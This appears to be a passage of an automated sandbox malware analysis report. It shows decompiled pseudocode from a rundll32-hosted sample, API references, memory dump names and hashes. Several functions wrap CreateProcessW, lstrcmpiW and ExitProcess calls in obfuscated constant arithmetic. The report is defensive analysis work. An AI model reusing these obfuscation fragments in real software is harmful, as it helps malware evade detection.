						E6ECDEB2A(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6ECDF676(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6ECE1C23(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x6ecdfaa0
0x6ecdfaa0
0x6ecdfaa7
0x6ecdfab0
0x6ecdfbcf
0x6ecdfab6
0x6ecdfab6
0x6ecdfab7
0x6ecdfab8
0x6ecdfac2
0x6ecdfac5
0x6ecdfacb
0x6ecdfad5
0x6ecdfafa
0x6ecdfaff
0x6ecdfb04
0x6ecdfbcb
0x00000000
0x6ecdfbcc
0x6ecdfb04
0x6ecdfad5
0x6ecdfb0a
0x6ecdfb0d
0x6ecdfb10
0x6ecdfb16
0x6ecdfb1c
0x6ecdfb2e
0x6ecdfb33
0x6ecdfb36
0x6ecdfb39
0x6ecdfb3c
0x6ecdfb3f
0x6ecdfb45
0x6ecdfb4b
0x6ecdfb4e
0x6ecdfb51
0x6ecdfb60
0x6ecdfb61
0x6ecdfb61
0x6ecdfb66
0x6ecdfb79
0x6ecdfb7b
0x6ecdfb80
0x6ecdfb8b
0x6ecdfb8d
0x6ecdfb8f
0x6ecdfbab
0x6ecdfbb0
0x6ecdfbb3
0x6ecdfbb3
0x6ecdfb8b
0x6ecdfb80
0x6ecdfbb9
0x6ecdfbba
0x6ecdfbbd
0x6ecdfbc0
0x6ecdfbc3
0x6ecdfbc6
0x6ecdfb51
0x00000000
0x6ecdfb45
0x6ecdfbd0
0x6ecdfbd5
0x6ecdfbd9
0x6ecdfbdc
0x6ecdfbdd
0x6ecdfbde
0x6ecdfbdf
0x6ecdfbe4
0x6ecdfc5c
0x6ecdfc5e
0x6ecdfbe6
0x6ecdfbe6
0x6ecdfbec
0x00000000
0x6ecdfbee
0x6ecdfbf1
0x6ecdfbf4
0x6ecdfbfb
0x6ecdfbfe
0x6ecdfc02
0x6ecdfc34
0x6ecdfc37
0x6ecdfc3e
0x6ecdfc44
0x6ecdfc4e
0x6ecdfc57
0x6ecdfc57
0x6ecdfc4e
0x6ecdfc44
0x6ecdfc58
0x6ecdfc04
0x6ecdfc04
0x6ecdfc04
0x6ecdfc07
0x6ecdfc07
0x6ecdfc0b
0x00000000
0x00000000
0x6ecdfc0f
0x6ecdfc23
0x6ecdfc23
0x6ecdfc11
0x6ecdfc11
0x6ecdfc17
0x00000000
0x6ecdfc19
0x6ecdfc19
0x6ecdfc1c
0x6ecdfc21
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecdfc21
0x6ecdfc17
0x6ecdfc2c
0x6ecdfc2e
0x00000000
0x6ecdfc30
0x6ecdfc30
0x6ecdfc30
0x00000000
0x6ecdfc2e
0x6ecdfc27
0x6ecdfc29
0x00000000
0x6ecdfc29
0x00000000
0x00000000
0x00000000
0x6ecdfbf4
0x6ecdfbec
0x6ecdfc5f
0x6ecdfc63
0x6ecdfc63

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6ECDFAC5

Strings

RCC, xrefs: 6ECDFADF
MOC, xrefs: 6ECDFAD7

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 2805fb9c02d9954c2090837fcb88a9d1b34c989453dbbd0c87a69f0106fef842
Instruction ID: e526ca3365c2e67f0dd2efc27411750f4cf0f6a69ef948f5642449aabbf42156
Opcode Fuzzy Hash: 2805fb9c02d9954c2090837fcb88a9d1b34c989453dbbd0c87a69f0106fef842
Instruction Fuzzy Hash: BA414732900149BFCF05CF94C990EEEBBB9BF48304F248499EA15A6254E3369955DB51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4532 Parent PID: 4608 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1019
Total number of Limit Nodes:	5

Executed Functions

Function 01109100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E01109100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t52;
				int _t60;
				WCHAR* _t64;

				_t64 = __edx;
				_push(0);
				_push(0);
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E010F8002(_t52);
				_v28 = 0x2905a5;
				_v24 = 0;
				_v12 = 0xa2d8b8;
				_v12 = _v12 + 0xfffff871;
				_v12 = _v12 ^ 0x5b121ec8;
				_v12 = _v12 ^ 0x21b4fd5f;
				_v12 = _v12 ^ 0x7a067dbd;
				_v8 = 0x36027e;
				_v8 = _v8 ^ 0x6c06375b;
				_v8 = _v8 * 0x51;
				_v8 = _v8 + 0xffff0cdd;
				_v8 = _v8 ^ 0x3b3a0501;
				_v20 = 0x3133e6;
				_v20 = _v20 ^ 0xa81fc925;
				_v20 = _v20 ^ 0xa82b7027;
				_v16 = 0x47f0fa;
				_v16 = _v16 | 0xed8e49a9;
				_v16 = _v16 ^ 0xedcdbeb4;
				E0110E399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
				return _t60;
			}

0x0110910a
0x0110910c
0x0110910d
0x0110910e
0x01109111
0x01109114
0x01109117
0x0110911a
0x0110911d
0x01109120
0x01109123
0x01109126
0x01109127
0x0110912a
0x0110912d
0x01109130
0x01109133
0x01109134
0x01109137
0x01109138
0x01109139
0x0110913a
0x0110913f
0x01109149
0x0110914c
0x01109153
0x0110915a
0x01109161
0x01109168
0x0110916f
0x01109176
0x0110918e
0x01109191
0x01109198
0x0110919f
0x011091a6
0x011091ad
0x011091b4
0x011091bb
0x011091c2
0x011091d5
0x011091ef
0x011091f6

APIs

CreateProcessW.KERNELBASE(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 011091EF

Strings

31, xrefs: 0110919F

Memory Dump Source

Source File: 00000005.00000002.540649559.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 31
API String ID: 963392458-1099231638
Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction ID: b995e9232446484b0c9fafdde4bd55495c27692a21b8c2a6fc42525261502ee3
Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction Fuzzy Hash: A131D272801259BBCF559FA6CD45CDFBFB5FF89714F108158FA1462120C3728A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01100207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E01100207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t54;
				int _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				WCHAR* _t81;

				_push(_a16);
				_t81 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E010F8002(_t54);
				_v36 = 0xa7e4f2;
				asm("stosd");
				_t70 = 0x7b;
				asm("stosd");
				asm("stosd");
				_v12 = 0x53fdc4;
				_t71 = 0x5a;
				_v12 = _v12 / _t70;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xe1fe8b09;
				_v12 = _v12 ^ 0xe1ac8480;
				_v20 = 0x744728;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x239bcee7;
				_v16 = 0xd5199;
				_v16 = _v16 + 0xffff5a50;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000f59f5;
				_v8 = 0xa57c1a;
				_v8 = _v8 | 0x119c25df;
				_v8 = _v8 + 0xffffdcc6;
				_t72 = 0x4f;
				_v8 = _v8 / _t72;
				_v8 = _v8 ^ 0x003b1570;
				E0110E399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
				_t68 = lstrcmpiW(_a8, _t81); // executed
				return _t68;
			}

0x0110020f
0x01100212
0x01100214
0x01100217
0x0110021a
0x0110021d
0x0110021f
0x01100224
0x01100232
0x01100235
0x01100238
0x01100239
0x0110023a
0x01100246
0x01100247
0x0110024c
0x01100250
0x01100257
0x0110025e
0x01100265
0x01100269
0x01100270
0x01100277
0x01100285
0x0110028a
0x01100291
0x01100298
0x0110029f
0x011002a9
0x011002af
0x011002b2
0x011002d5
0x011002e1
0x011002e8

APIs

lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 011002E1

Strings

(Gt, xrefs: 0110025E

Memory Dump Source

Source File: 00000005.00000002.540649559.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10f0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: c997bcf25bad6118f05ff02e98cd2f82151bb0d6328ae7051629fcf6e86b74db
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: 712166B5E00208FBEF04DFA5CC0A9DEBBB2FB44314F10C599E515AA250D7B65A10DF90

Uniqueness

Uniqueness Score: -1.00%

Function 010FF3F7, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E010FF3F7() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t47;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xb0bfd;
				_v32 = 0x231de0;
				_v20 = 0x822c7a;
				_t47 = 0x31;
				_push(_t47);
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x12d3a120;
				_v12 = 0x122796;
				_v12 = _v12 | 0x5fffe7f7;
				_v12 = _v12 ^ 0x5ff36a5b;
				_v8 = 0xc53dc4;
				_v8 = _v8 + 0xffff669e;
				_v8 = _v8 + 0xba03;
				_v8 = _v8 + 0x1f9e;
				_v8 = _v8 ^ 0x00c2122b;
				_v16 = 0x5857ad;
				_v16 = _v16 / _t47;
				_v16 = _v16 ^ 0x000b8ebe;
				E0110E399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
				ExitProcess(0);
			}

0x010ff3fd
0x010ff403
0x010ff407
0x010ff40e
0x010ff415
0x010ff422
0x010ff423
0x010ff429
0x010ff42c
0x010ff433
0x010ff43a
0x010ff441
0x010ff448
0x010ff44f
0x010ff456
0x010ff45d
0x010ff464
0x010ff46b
0x010ff479
0x010ff47c
0x010ff495
0x010ff49f

APIs

ExitProcess.KERNEL32(00000000), ref: 010FF49F

Memory Dump Source

Source File: 00000005.00000002.540649559.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction ID: 4b6320cb4ee736c6cba61f17dd6ed1af8187f2b4a5d6122f493335bccfd9647c
Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction Fuzzy Hash: BF1106B1E1121DEBDF04DFE4C94A6EEBBB4FB14315F108188E521AA280E7B45B548F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6516 Parent PID: 5808 rundll32.exeCOMMON

Executed Functions

Function 01129100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E01129100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t52;
				int _t60;
				WCHAR* _t64;

				_t64 = __edx;
				_push(0);
				_push(0);
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E01118002(_t52);
				_v28 = 0x2905a5;
				_v24 = 0;
				_v12 = 0xa2d8b8;
				_v12 = _v12 + 0xfffff871;
				_v12 = _v12 ^ 0x5b121ec8;
				_v12 = _v12 ^ 0x21b4fd5f;
				_v12 = _v12 ^ 0x7a067dbd;
				_v8 = 0x36027e;
				_v8 = _v8 ^ 0x6c06375b;
				_v8 = _v8 * 0x51;
				_v8 = _v8 + 0xffff0cdd;
				_v8 = _v8 ^ 0x3b3a0501;
				_v20 = 0x3133e6;
				_v20 = _v20 ^ 0xa81fc925;
				_v20 = _v20 ^ 0xa82b7027;
				_v16 = 0x47f0fa;
				_v16 = _v16 | 0xed8e49a9;
				_v16 = _v16 ^ 0xedcdbeb4;
				E0112E399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
				return _t60;
			}

0x0112910a
0x0112910c
0x0112910d
0x0112910e
0x01129111
0x01129114
0x01129117
0x0112911a
0x0112911d
0x01129120
0x01129123
0x01129126
0x01129127
0x0112912a
0x0112912d
0x01129130
0x01129133
0x01129134
0x01129137
0x01129138
0x01129139
0x0112913a
0x0112913f
0x01129149
0x0112914c
0x01129153
0x0112915a
0x01129161
0x01129168
0x0112916f
0x01129176
0x0112918e
0x01129191
0x01129198
0x0112919f
0x011291a6
0x011291ad
0x011291b4
0x011291bb
0x011291c2
0x011291d5
0x011291ef
0x011291f6

APIs

CreateProcessW.KERNELBASE(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 011291EF

Strings

31, xrefs: 0112919F

Memory Dump Source

Source File: 00000008.00000002.557294263.0000000001110000.00000040.00000010.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1110000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 31
API String ID: 963392458-1099231638
Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction ID: 227bd837ed5431d0a47fea1ed6742eec9a0d5125ce0b2ca520d763659517aef3
Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction Fuzzy Hash: 9B31D272801259BBCF559FA6CD45CDFBFB5FF89714F108158FA1462120C3728A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01120207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E01120207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t54;
				int _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				WCHAR* _t81;

				_push(_a16);
				_t81 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E01118002(_t54);
				_v36 = 0xa7e4f2;
				asm("stosd");
				_t70 = 0x7b;
				asm("stosd");
				asm("stosd");
				_v12 = 0x53fdc4;
				_t71 = 0x5a;
				_v12 = _v12 / _t70;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xe1fe8b09;
				_v12 = _v12 ^ 0xe1ac8480;
				_v20 = 0x744728;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x239bcee7;
				_v16 = 0xd5199;
				_v16 = _v16 + 0xffff5a50;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000f59f5;
				_v8 = 0xa57c1a;
				_v8 = _v8 | 0x119c25df;
				_v8 = _v8 + 0xffffdcc6;
				_t72 = 0x4f;
				_v8 = _v8 / _t72;
				_v8 = _v8 ^ 0x003b1570;
				E0112E399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
				_t68 = lstrcmpiW(_a8, _t81); // executed
				return _t68;
			}

0x0112020f
0x01120212
0x01120214
0x01120217
0x0112021a
0x0112021d
0x0112021f
0x01120224
0x01120232
0x01120235
0x01120238
0x01120239
0x0112023a
0x01120246
0x01120247
0x0112024c
0x01120250
0x01120257
0x0112025e
0x01120265
0x01120269
0x01120270
0x01120277
0x01120285
0x0112028a
0x01120291
0x01120298
0x0112029f
0x011202a9
0x011202af
0x011202b2
0x011202d5
0x011202e1
0x011202e8

APIs

lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 011202E1

Strings

(Gt, xrefs: 0112025E

Memory Dump Source

Source File: 00000008.00000002.557294263.0000000001110000.00000040.00000010.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1110000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: 45ab4f9904a1056a98dd275c8efab5445356aaa63d6858580714b4ab715b5ec1
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: 8D2178B5E00208FBEF08DFA4CC0A9DEBBB2FB44314F10C1A9E515AA250D7B65A11DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0111F3F7, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0111F3F7() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t47;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xb0bfd;
				_v32 = 0x231de0;
				_v20 = 0x822c7a;
				_t47 = 0x31;
				_push(_t47);
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x12d3a120;
				_v12 = 0x122796;
				_v12 = _v12 | 0x5fffe7f7;
				_v12 = _v12 ^ 0x5ff36a5b;
				_v8 = 0xc53dc4;
				_v8 = _v8 + 0xffff669e;
				_v8 = _v8 + 0xba03;
				_v8 = _v8 + 0x1f9e;
				_v8 = _v8 ^ 0x00c2122b;
				_v16 = 0x5857ad;
				_v16 = _v16 / _t47;
				_v16 = _v16 ^ 0x000b8ebe;
				E0112E399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
				ExitProcess(0);
			}

0x0111f3fd
0x0111f403
0x0111f407
0x0111f40e
0x0111f415
0x0111f422
0x0111f423
0x0111f429
0x0111f42c
0x0111f433
0x0111f43a
0x0111f441
0x0111f448
0x0111f44f
0x0111f456
0x0111f45d
0x0111f464
0x0111f46b
0x0111f479
0x0111f47c
0x0111f495
0x0111f49f

APIs

ExitProcess.KERNEL32(00000000), ref: 0111F49F

Memory Dump Source

Source File: 00000008.00000002.557294263.0000000001110000.00000040.00000010.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1110000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction ID: c1ec5b00410513fdd550a60d03cb992f1810eb90199b6279dc891f1f720e8d78
Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction Fuzzy Hash: 2F11D6B1E1121DEBDF04DFE4D94A6EEBBB4FB14315F108188E521AA250E7B45B558F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 1840 Parent PID: 4540 rundll32.exeCOMMON

Executed Functions

Function 00BD9100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E00BD9100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t52;
				int _t60;
				WCHAR* _t64;

				_t64 = __edx;
				_push(0);
				_push(0);
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E00BC8002(_t52);
				_v28 = 0x2905a5;
				_v24 = 0;
				_v12 = 0xa2d8b8;
				_v12 = _v12 + 0xfffff871;
				_v12 = _v12 ^ 0x5b121ec8;
				_v12 = _v12 ^ 0x21b4fd5f;
				_v12 = _v12 ^ 0x7a067dbd;
				_v8 = 0x36027e;
				_v8 = _v8 ^ 0x6c06375b;
				_v8 = _v8 * 0x51;
				_v8 = _v8 + 0xffff0cdd;
				_v8 = _v8 ^ 0x3b3a0501;
				_v20 = 0x3133e6;
				_v20 = _v20 ^ 0xa81fc925;
				_v20 = _v20 ^ 0xa82b7027;
				_v16 = 0x47f0fa;
				_v16 = _v16 | 0xed8e49a9;
				_v16 = _v16 ^ 0xedcdbeb4;
				E00BDE399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
				return _t60;
			}

0x00bd910a
0x00bd910c
0x00bd910d
0x00bd910e
0x00bd9111
0x00bd9114
0x00bd9117
0x00bd911a
0x00bd911d
0x00bd9120
0x00bd9123
0x00bd9126
0x00bd9127
0x00bd912a
0x00bd912d
0x00bd9130
0x00bd9133
0x00bd9134
0x00bd9137
0x00bd9138
0x00bd9139
0x00bd913a
0x00bd913f
0x00bd9149
0x00bd914c
0x00bd9153
0x00bd915a
0x00bd9161
0x00bd9168
0x00bd916f
0x00bd9176
0x00bd918e
0x00bd9191
0x00bd9198
0x00bd919f
0x00bd91a6
0x00bd91ad
0x00bd91b4
0x00bd91bb
0x00bd91c2
0x00bd91d5
0x00bd91ef
0x00bd91f6

APIs

CreateProcessW.KERNELBASE(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 00BD91EF

Strings

31, xrefs: 00BD919F

Memory Dump Source

Source File: 0000000D.00000002.659478506.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_bc0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 31
API String ID: 963392458-1099231638
Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction ID: e4a4c91fc34e338f20c85f7237b7f19e42b64cec2db2714a144003c8f2b57f2e
Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction Fuzzy Hash: 3631D272801259BBCF559FA6CD45CDFBFB5FF89714F108158FA2462120C3728A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00BD0207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t54;
				int _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				WCHAR* _t81;

				_push(_a16);
				_t81 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00BC8002(_t54);
				_v36 = 0xa7e4f2;
				asm("stosd");
				_t70 = 0x7b;
				asm("stosd");
				asm("stosd");
				_v12 = 0x53fdc4;
				_t71 = 0x5a;
				_v12 = _v12 / _t70;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xe1fe8b09;
